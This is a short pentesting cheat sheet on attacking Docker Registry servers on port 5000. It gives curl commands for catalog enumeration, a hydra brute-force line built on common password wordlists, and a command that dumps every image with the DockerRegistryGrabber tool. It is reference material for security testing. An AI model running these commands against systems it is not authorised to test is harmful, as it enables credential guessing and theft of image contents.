Pentesting Ports
Port 5000/Docker Registry
Pentesting-Ports
Introduction
A Docker registry is a repository for Docker images. Docker images are essentially snapshots of a Docker container, which is a lightweight, standalone, executable package that includes everything needed to run a piece of software, including the code, runtime, libraries, and dependencies.
A Docker registry stores these images, allowing users to push and pull images to and from it. This enables teams to share and distribute their Docker images easily
Table of Contents
Default port: 5000
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)Pentesting Docker Registry
Discover
/v2/
/v2/_catalogEnumeration
curl -s http://IP:5000/v2/_catalogAuthentication
Docker registry may also be configured to require authentication:
curl -k https://192.25.197.3:5000/v2/_catalog
#If Authentication required
{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required
{"repositories":["alpine","ubuntu"]}BruteForce Docker Registry
hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt IP -s 5000 https-get /v2/DockerRegistryGrabber
With access to the docker registry with this tool https://github.com/Syzik/DockerRegistryGrabber you can dump all files from the registry.
usage: drg.py [-h] [-p port] [-U USERNAME] [-P PASSWORD] [-A header]
[--list | --dump_all | --dump DOCKERNAME]
url
drg.py: error: the following arguments are required: urlpython3 drg.py https://IP-URL -U 'USERNAME' -P 'PASSWORD' --dump_allLast updated on